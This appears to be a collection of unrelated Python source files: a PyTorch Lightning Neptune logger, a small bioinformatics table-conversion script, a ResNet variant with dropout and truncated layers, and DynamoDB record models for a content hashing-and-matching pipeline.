If ``None``, the value of `NEPTUNE_PROJECT` environment variable will be taken.
You need to create the project in https://neptune.ai first.
name: Optional. Editable name of the run.
Run name appears in the "all metadata/sys" section in Neptune UI.
run: Optional. Default is ``None``. The Neptune ``Run`` object.
            If specified, this ``Run`` will be used for logging, instead of a new Run.
            When a run object is passed, you can't specify other Neptune properties.
log_model_checkpoints: Optional. Default is ``True``. Log model checkpoint to Neptune.
Works only if ``ModelCheckpoint`` is passed to the ``Trainer``.
prefix: Optional. Default is ``"training"``. Root namespace for all metadata logging.
\**neptune_run_kwargs: Additional arguments like ``tags``, ``description``, ``capture_stdout``, etc.
used when run is created.
Raises:
ModuleNotFoundError:
            If the required Neptune package (version >=0.9) is not installed on the device.
TypeError:
If configured project has not been migrated to new structure yet.
ValueError:
If argument passed to the logger's constructor is incorrect.
"""
LOGGER_JOIN_CHAR = "/"
PARAMETERS_KEY = "hyperparams"
ARTIFACTS_KEY = "artifacts"
def __init__(
self,
*, # force users to call `NeptuneLogger` initializer with `kwargs`
api_key: Optional[str] = None,
project: Optional[str] = None,
name: Optional[str] = None,
run: Optional["Run"] = None,
log_model_checkpoints: Optional[bool] = True,
prefix: str = "training",
agg_key_funcs: Optional[Mapping[str, Callable[[Sequence[float]], float]]] = None,
agg_default_func: Optional[Callable[[Sequence[float]], float]] = None,
**neptune_run_kwargs,
):
# verify if user passed proper init arguments
self._verify_input_arguments(api_key, project, name, run, neptune_run_kwargs)
if neptune is None:
raise ModuleNotFoundError(
"You want to use the `Neptune` logger which is not installed yet, install it with"
" `pip install neptune-client`."
)
super().__init__(agg_key_funcs=agg_key_funcs, agg_default_func=agg_default_func)
self._log_model_checkpoints = log_model_checkpoints
self._prefix = prefix
self._run_name = name
self._project_name = project
self._api_key = api_key
self._run_instance = run
self._neptune_run_kwargs = neptune_run_kwargs
self._run_short_id = None
if self._run_instance is not None:
self._retrieve_run_data()
            # make sure that we log the integration version for externally supplied `Run` instances
self._run_instance[_INTEGRATION_VERSION_KEY] = __version__
def _retrieve_run_data(self):
try:
self._run_instance.wait()
self._run_short_id = self._run_instance["sys/id"].fetch()
self._run_name = self._run_instance["sys/name"].fetch()
except NeptuneOfflineModeFetchException:
self._run_short_id = "OFFLINE"
self._run_name = "offline-name"
@property
def _neptune_init_args(self):
args = {}
# Backward compatibility in case of previous version retrieval
try:
args = self._neptune_run_kwargs
except AttributeError:
pass
if self._project_name is not None:
args["project"] = self._project_name
if self._api_key is not None:
args["api_token"] = self._api_key
if self._run_short_id is not None:
args["run"] = self._run_short_id
# Backward compatibility in case of previous version retrieval
try:
if self._run_name is not None:
args["name"] = self._run_name
except AttributeError:
pass
return args
def _construct_path_with_prefix(self, *keys) -> str:
"""Return sequence of keys joined by `LOGGER_JOIN_CHAR`, started with `_prefix` if defined."""
if self._prefix:
return self.LOGGER_JOIN_CHAR.join([self._prefix, *keys])
return self.LOGGER_JOIN_CHAR.join(keys)
@staticmethod
def _verify_input_arguments(
api_key: Optional[str],
project: Optional[str],
name: Optional[str],
run: Optional["Run"],
neptune_run_kwargs: dict,
):
legacy_kwargs_msg = (
"Following kwargs are deprecated: {legacy_kwargs}.\n"
"If you are looking for the Neptune logger using legacy Python API,"
" it's still available as part of neptune-contrib package:\n"
" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
"The NeptuneLogger was re-written to use the neptune.new Python API\n"
" - https://neptune.ai/blog/neptune-new\n"
" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
"You should use arguments accepted by either NeptuneLogger.init() or neptune.init()"
)
# check if user used legacy kwargs expected in `NeptuneLegacyLogger`
used_legacy_kwargs = [
legacy_kwarg for legacy_kwarg in neptune_run_kwargs if legacy_kwarg in _LEGACY_NEPTUNE_INIT_KWARGS
]
if used_legacy_kwargs:
raise ValueError(legacy_kwargs_msg.format(legacy_kwargs=used_legacy_kwargs))
# check if user used legacy kwargs expected in `NeptuneLogger` from neptune-pytorch-lightning package
used_legacy_neptune_kwargs = [
legacy_kwarg for legacy_kwarg in neptune_run_kwargs if legacy_kwarg in _LEGACY_NEPTUNE_LOGGER_KWARGS
]
if used_legacy_neptune_kwargs:
raise ValueError(legacy_kwargs_msg.format(legacy_kwargs=used_legacy_neptune_kwargs))
# check if user passed new client `Run` object
if run is not None and not isinstance(run, Run):
raise ValueError(
"Run parameter expected to be of type `neptune.new.Run`.\n"
"If you are looking for the Neptune logger using legacy Python API,"
" it's still available as part of neptune-contrib package:\n"
" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
"The NeptuneLogger was re-written to use the neptune.new Python API\n"
" - https://neptune.ai/blog/neptune-new\n"
" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
)
# check if user passed redundant neptune.init arguments when passed run
any_neptune_init_arg_passed = any(arg is not None for arg in [api_key, project, name]) or neptune_run_kwargs
if run is not None and any_neptune_init_arg_passed:
raise ValueError(
"When an already initialized run object is provided"
" you can't provide other neptune.init() parameters.\n"
)
def __getstate__(self):
state = self.__dict__.copy()
# Run instance can't be pickled
state["_run_instance"] = None
return state
def __setstate__(self, state):
self.__dict__ = state
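        # Re-attach to the same Neptune run after unpickling (e.g. when the logger is sent to another
        # process): _neptune_init_args carries the stored short run id, so neptune.init() resumes that run.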
self._run_instance = neptune.init(**self._neptune_init_args)
@property
@rank_zero_experiment
def experiment(self) -> Run:
r"""
Actual Neptune run object. Allows you to use neptune logging features in your
:class:`~pytorch_lightning.core.lightning.LightningModule`.
Example::
class LitModel(LightningModule):
def training_step(self, batch, batch_idx):
# log metrics
acc = ...
self.logger.experiment["train/acc"].log(acc)
# log images
img = ...
self.logger.experiment["train/misclassified_images"].log(File.as_image(img))
Note that syntax: ``self.logger.experiment["your/metadata/structure"].log(metadata)``
is specific to Neptune and it extends logger capabilities.
Specifically, it allows you to log various types of metadata like scores, files,
images, interactive visuals, CSVs, etc. Refer to the
`Neptune docs <https://docs.neptune.ai/you-should-know/logging-metadata#essential-logging-methods>`_
for more detailed explanations.
You can also use regular logger methods ``log_metrics()``, and ``log_hyperparams()``
with NeptuneLogger as these are also supported.
"""
return self.run
@property
@rank_zero_experiment
def run(self) -> Run:
try:
if not self._run_instance:
self._run_instance = neptune.init(**self._neptune_init_args)
self._retrieve_run_data()
                # make sure that we log the integration version for the newly created run
self._run_instance[_INTEGRATION_VERSION_KEY] = __version__
return self._run_instance
except NeptuneLegacyProjectException as e:
raise TypeError(
f"Project {self._project_name} has not been migrated to the new structure."
" You can still integrate it with the Neptune logger using legacy Python API"
" available as part of neptune-contrib package:"
" https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
) from e
@rank_zero_only
def log_hyperparams(self, params: Union[Dict[str, Any], Namespace]) -> None: # skipcq: PYL-W0221
r"""
Log hyper-parameters to the run.
Hyperparams will be logged under the "<prefix>/hyperparams" namespace.
Note:
You can also log parameters by directly using the logger instance:
``neptune_logger.experiment["model/hyper-parameters"] = params_dict``.
In this way you can keep hierarchical structure of the parameters.
Args:
params: `dict`.
Python dictionary structure with parameters.
Example::
from pytorch_lightning.loggers import NeptuneLogger
PARAMS = {
"batch_size": 64,
"lr": 0.07,
"decay_factor": 0.97
}
neptune_logger = NeptuneLogger(
api_key="ANONYMOUS",
project="common/pytorch-lightning-integration"
)
neptune_logger.log_hyperparams(PARAMS)
"""
params = _convert_params(params)
params = _sanitize_callable_params(params)
parameters_key = self.PARAMETERS_KEY
parameters_key = self._construct_path_with_prefix(parameters_key)
self.run[parameters_key] = params
@rank_zero_only
def log_metrics(self, metrics: Dict[str, Union[torch.Tensor, float]], step: Optional[int] = None) -> None:
"""Log metrics (numeric values) in Neptune runs.
Args:
metrics: Dictionary with metric names as keys and measured quantities as values.
step: Step number at which the metrics should be recorded, currently ignored.
"""
if rank_zero_only.rank != 0:
raise ValueError("run tried to log from global_rank != 0")
metrics = _add_prefix(metrics, self._prefix, self.LOGGER_JOIN_CHAR)
for key, val in metrics.items():
# `step` is ignored because Neptune expects strictly increasing step values which
# Lightning does not always guarantee.
self.run[key].log(val)
@rank_zero_only
def finalize(self, status: str) -> None:
if status:
self.run[self._construct_path_with_prefix("status")] = status
super().finalize(status)
@property
def save_dir(self) -> Optional[str]:
"""Gets the save directory of the experiment which in this case is ``None`` because Neptune does not save
locally.
Returns:
the root directory where experiment logs get saved
"""
return os.path.join(os.getcwd(), ".neptune")
@rank_zero_only
def log_model_summary(self, model, max_depth=-1):
model_str = str(ModelSummary(model=model, max_depth=max_depth))
self.run[self._construct_path_with_prefix("model/summary")] = neptune.types.File.from_content(
content=model_str, extension="txt"
)
@rank_zero_only
def after_save_checkpoint(self, checkpoint_callback: "ReferenceType[ModelCheckpoint]") -> None:
"""Automatically log checkpointed model. Called after model checkpoint callback saves a new checkpoint.
Args:
checkpoint_callback: the model checkpoint callback instance
"""
if not self._log_model_checkpoints:
return
file_names = set()
checkpoints_namespace = self._construct_path_with_prefix("model/checkpoints")
# save last model
if checkpoint_callback.last_model_path:
model_last_name = self._get_full_model_name(checkpoint_callback.last_model_path, checkpoint_callback)
file_names.add(model_last_name)
self.run[f"{checkpoints_namespace}/{model_last_name}"].upload(checkpoint_callback.last_model_path)
# save best k models
for key in checkpoint_callback.best_k_models.keys():
model_name = self._get_full_model_name(key, checkpoint_callback)
file_names.add(model_name)
self.run[f"{checkpoints_namespace}/{model_name}"].upload(key)
# log best model path and checkpoint
if checkpoint_callback.best_model_path:
self.run[self._construct_path_with_prefix("model/best_model_path")] = checkpoint_callback.best_model_path
model_name = self._get_full_model_name(checkpoint_callback.best_model_path, checkpoint_callback)
file_names.add(model_name)
self.run[f"{checkpoints_namespace}/{model_name}"].upload(checkpoint_callback.best_model_path)
# remove old models logged to experiment if they are not part of best k models at this point
if self.run.exists(checkpoints_namespace):
exp_structure = self.run.get_structure()
uploaded_model_names = self._get_full_model_names_from_exp_structure(exp_structure, checkpoints_namespace)
for file_to_drop in list(uploaded_model_names - file_names):
del self.run[f"{checkpoints_namespace}/{file_to_drop}"]
# log best model score
if checkpoint_callback.best_model_score:
self.run[self._construct_path_with_prefix("model/best_model_score")] = (
checkpoint_callback.best_model_score.cpu().detach().numpy()
)
@staticmethod
def _get_full_model_name(model_path: str, checkpoint_callback: "ReferenceType[ModelCheckpoint]") -> str:
"""Returns model name which is string `model_path` appended to `checkpoint_callback.dirpath`."""
expected_model_path = f"{checkpoint_callback.dirpath}{os.path.sep}"
if not model_path.startswith(expected_model_path):
raise ValueError(f"{model_path} was expected to start with {expected_model_path}.")
# Remove extension from filepath
filepath, _ = os.path.splitext(model_path[len(expected_model_path) :])
return filepath
@classmethod
def _get_full_model_names_from_exp_structure(cls, exp_structure: dict, namespace: str) -> Set[str]:
"""Returns all paths to properties which were already logged in `namespace`"""
structure_keys = namespace.split(cls.LOGGER_JOIN_CHAR)
uploaded_models_dict = reduce(lambda d, k: d[k], [exp_structure, *structure_keys])
return set(cls._dict_paths(uploaded_models_dict))
@classmethod
def _dict_paths(cls, d: dict, path_in_build: str = None) -> Generator:
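        # e.g. {"a": {"b": 1, "c": {"d": 2}}} yields "a/b" and "a/c/d"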
for k, v in d.items():
path = f"{path_in_build}/{k}" if path_in_build is not None else k
if not isinstance(v, dict):
yield path
else:
yield from cls._dict_paths(v, path)
@property
def name(self) -> str:
"""Return the experiment name or 'offline-name' when exp is run in offline mode."""
return self._run_name
@property
def version(self) -> str:
"""Return the experiment version.
It's Neptune Run's short_id
"""
return self._run_short_id
@staticmethod
def _signal_deprecated_api_usage(f_name, sample_code, raise_exception=False):
msg_suffix = (
f"If you are looking for the Neptune logger using legacy Python API,"
f" it's still available as part of neptune-contrib package:\n"
f" - https://docs-legacy.neptune.ai/integrations/pytorch_lightning.html\n"
f"The NeptuneLogger was re-written to use the neptune.new Python API\n"
f" - https://neptune.ai/blog/neptune-new\n"
f" - https://docs.neptune.ai/integrations-and-supported-tools/model-training/pytorch-lightning\n"
f"Instead of `logger.{f_name}` you can use:\n"
f"\t{sample_code}"
)
if not raise_exception:
warnings.warn(
"The function you've used is deprecated in v1.5.0 and will be removed in v1.7.0. " + msg_suffix
)
else:
raise ValueError("The function you've used is deprecated.\n" + msg_suffix)
@rank_zero_only
def log_metric(self, metric_name: str, metric_value: Union[torch.Tensor, float, str], step: Optional[int] = None):
key = f"{self._prefix}/{metric_name}"
self._signal_deprecated_api_usage("log_metric", f"logger.run['{key}'].log(42)")
if torch.is_tensor(metric_value):
metric_value = metric_value.cpu().detach()
self.run[key].log(metric_value, step=step)
@rank_zero_only
def log_text(self, log_name: str, text: str, step: Optional[int] = None) -> None:
key = f"{self._prefix}/{log_name}"
        self._signal_deprecated_api_usage("log_text", f"logger.run['{key}'].log('text')")
self.run[key].log(str(text), step=step)
@rank_zero_only
def log_image(self, log_name: str, image: Union[str, Any], step: Optional[int] = None) -> None:
key = f"{self._prefix}/{log_name}"
self._signal_deprecated_api_usage("log_image", f"logger.run['{key}'].log(File('path_to_image'))")
if isinstance(image, str):
# if `img` is path to file, convert it to file object
image = NeptuneFile(image)
self.run[key].log(image, step=step)
@rank_zero_only
def log_artifact(self, artifact: str, destination: Optional[str] = None) -> None:
key = f"{self._prefix}/{self.ARTIFACTS_KEY}/{artifact}"
        self._signal_deprecated_api_usage("log_artifact", f"logger.run['{key}'].log('path_to_file')")
self.run[key].log(destination)
def set_property(self, *args, **kwargs):
        self._signal_deprecated_api_usage(
            "set_property", f"logger.run['{self._prefix}/{self.PARAMETERS_KEY}/key'].log(value)", raise_exception=True
        )
def append_tags(self, *args, **kwargs):
self._signal_deprecated_api_usage(
"append_tags", "logger.run['sys/tags'].add(['foo', 'bar'])", raise_exception=True
)
|
py | 7df7f58be9af32768db9ebc4cfda7fb104c1dde2 | #!/usr/bin/python
import pandas as pd
import numpy as np
# Read the '|'-separated transcript-to-gene reference table produced upstream.
orig_file = pd.read_csv("/projectnb/bf528/users/tinman/Project4/datacurator/txp2gene_pre.tsv", sep='|')
file = pd.DataFrame(orig_file).to_numpy()
txp2gene = open("txp2gene_v2.txt", "w")
# The first transcript/gene pair is presumably consumed as the CSV header by read_csv, so write it
# back once up front (the original wrote this constant before every row, duplicating it).
txp2gene.write("ENST00000456328.2\tENSG00000223972.5\n")
# One "transcript_id<TAB>gene_id" line per remaining row.
for line in file:
    txp2gene.write(str(line[0]) + '\t' + str(line[1]) + '\n')
txp2gene.close()
|
py | 7df7f6730a6a98771ab27d908658deb373233069 | # source code adapted from the torchvision ResNet implementation
# improved variant over vanilla ResNet:
# adds dropout and skips the last two stages (layer3 and layer4) in the forward pass
import torch
from torch import Tensor
import torch.nn as nn
from .utils.net_utils import load_state_dict_from_url
from typing import Type, Any, Callable, Union, List, Optional
__all__ = ['ResNet', 'improved_resnet18', 'improved_resnet34', 'improved_resnet50', 'improved_resnet101',
'improved_resnet152', 'improved_resnext50_32x4d', 'improved_resnext101_32x8d',
'improved_wide_resnet50_2', 'improved_wide_resnet101_2']
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-0676ba61.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
}
def conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv2d:
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv2d:
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(
self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
# Bottleneck in torchvision places the stride for downsampling at 3x3 convolution(self.conv2)
# while original implementation places the stride at the first 1x1 convolution(self.conv1)
    # according to "Deep residual learning for image recognition" (https://arxiv.org/abs/1512.03385).
# This variant is also known as ResNet V1.5 and improves accuracy according to
# https://ngc.nvidia.com/catalog/model-scripts/nvidia:resnet_50_v1_5_for_pytorch.
expansion: int = 4
def __init__(
self,
inplanes: int,
planes: int,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(
self,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
num_classes: int = 1000,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64,
replace_stride_with_dilation: Optional[List[bool]] = None,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
        self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
        # Dropout before the classifier; _forward_impl references self.drop, which the original
        # snippet never defined. p=0.5 is an assumed value.
        self.drop = nn.Dropout(p=0.5)
        self.fc = nn.Linear(128 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0) # type: ignore[arg-type]
def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,
stride: int = 1, dilate: bool = False) -> nn.Sequential:
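        # e.g. _make_layer(BasicBlock, 64, blocks=2) stacks two 64-channel BasicBlocks and adds a
        # 1x1-conv downsample shortcut only when the stride or channel count changes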
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
#x = self.layer3(x)
#x = self.layer4(x)
x = self.drop(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def _resnet(
arch: str,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
pretrained: bool,
progress: bool,
**kwargs: Any
) -> ResNet:
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
return model
def improved_resnet18(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-18 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def improved_resnet34(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-34 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def improved_resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-50 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def improved_resnet101(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-101 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,
**kwargs)
def improved_resnet152(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-152 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,
**kwargs)
def improved_resnext50_32x4d(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNeXt-50 32x4d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def improved_resnext101_32x8d(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNeXt-101 32x8d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def improved_wide_resnet50_2(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""Wide ResNet-50-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def improved_wide_resnet101_2(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""Wide ResNet-101-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
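# Minimal usage sketch (illustrative only): the truncated forward pass keeps layer1/layer2, so the
# classifier sees 128 * block.expansion features; pretrained=True would not match the released
# ImageNet checkpoints because of the smaller fc layer.
#   model = improved_resnet18(num_classes=10)
#   logits = model(torch.randn(1, 3, 224, 224))  # -> shape (1, 10)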
|
py | 7df7f6c13d2055e27b712f42b0fafd65e53dbbc9 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import datetime
from decimal import Decimal
import typing as t
from dataclasses import dataclass, field
from mypy_boto3_dynamodb.service_resource import Table
from boto3.dynamodb.conditions import Key
from threatexchange.content_type.meta import get_signal_types_by_name
from threatexchange.signal_type.signal_base import SignalType
from hmalib.common.models.models_base import DynamoDBItem, DynamoDBCursorKey
"""
Data transfer object classes to be used with dynamodbstore
Classes in this module should implement methods `to_dynamodb_item(self)` and
`to_sqs_message(self)`
"""
@dataclass
class RecentItems:
last_evaluated_key: DynamoDBCursorKey
# TODO: Can be generified for stronger typing.
items: t.List[t.Any]
@dataclass
class PipelineRecordBase(DynamoDBItem):
"""
Base Class for records of pieces of content going through the
hashing/matching pipeline.
"""
content_id: str
signal_type: t.Type[SignalType]
content_hash: str
updated_at: datetime.datetime
def to_dynamodb_item(self) -> dict:
raise NotImplementedError
def to_sqs_message(self) -> dict:
raise NotImplementedError
@classmethod
def get_recent_items_page(
cls, table: Table, ExclusiveStartKey: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
        Get a paginated list of recent items. The API is purposefully kept simple.
"""
raise NotImplementedError
@dataclass
class PipelineRecordDefaultsBase:
"""
Hash and match records may have signal_type specific attributes that are not
universal. eg. PDQ hashes have quality and PDQ matches have distance while
MD5 has neither. Assuming such signal_type specific attributes will not be
indexed, we are choosing to put them into a bag of variables. See
PipelineRecordBase.[de]serialize_signal_specific_attributes() to understand
storage.
Ideally, this would be an attribute with defaults, but that would make
inheritance complicated because default_values would precede non-default
values in the sub class.
"""
signal_specific_attributes: t.Dict[str, t.Union[int, float, str]] = field(
default_factory=dict
)
def serialize_signal_specific_attributes(self) -> dict:
"""
Converts signal_specific_attributes into a dict. Uses the signal_type as
a prefix.
So for PDQ hash records, `item.signal_specific_attributes.quality` will
become `item.pdq_quality`. Storing as top-level item attributes allows
indexing if we need it later. You can't do that with nested elements.
"""
# Note on Typing: PipelineRecordDefaultsBase is meant to be used with
# PipelineRecordBase. So it will have access to all fields from
# PipelineRecordBase. This is (impossible?) to express using mypy. So
# ignore self.signal_type
return {
f"{self.signal_type.get_name()}_{key}": value # type:ignore
for key, value in self.signal_specific_attributes.items()
}
@staticmethod
def _signal_specific_attribute_remove_prefix(prefix: str, k: str) -> str:
